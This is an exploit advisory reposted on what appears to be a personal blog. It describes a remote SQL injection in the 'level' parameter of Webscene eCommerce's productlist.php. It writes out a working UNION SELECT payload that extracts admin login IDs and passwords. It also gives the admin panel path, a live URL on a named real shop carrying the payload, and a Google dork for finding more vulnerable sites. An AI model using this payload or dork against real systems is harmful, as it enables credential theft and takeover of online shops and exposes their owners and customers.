############################################
Webscene eCommerce (level) Remote Sql Injection
vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#############################################
Bug Found By :Angela Chang (12-10-2008)
contact: angel@ch4ng.cc
#######################################
Greetz: nyubi & Vrs-Chk
especially thx to str0ke @ milw0rm.com
############################################
vuln file : productlist.php
Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.
exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--
Login admin : http://somehost/admin/
Demo Site : http://www.abcbeautyshop.co.uk/productlist.php?categoryid=20&level=-4%20union%20select%20concat(loginid,0x2f,password)%20from%20adminuser--
Google dork : inurl:productlist.php?categoryid= level
#############################################
http://www.securityfocus.com/archive/1/497324/30/0/threaded
bug pertama ku , ehheeeheh pertama kali belajar sql ya dapatlha ini bug...
-::- Your Country -::-
-::- About Me -::-
-::- Archive -::-
-::- Labels -::-
- c0li (10)
- Download (6)
- Exploit (7)
- Notes (8)
- Private Script (3)
-::- Tools -::-
-::- Links -::-
-::- Chat Box -::-
-::- Hit CounTer -::-
0 komentar:
Posting Komentar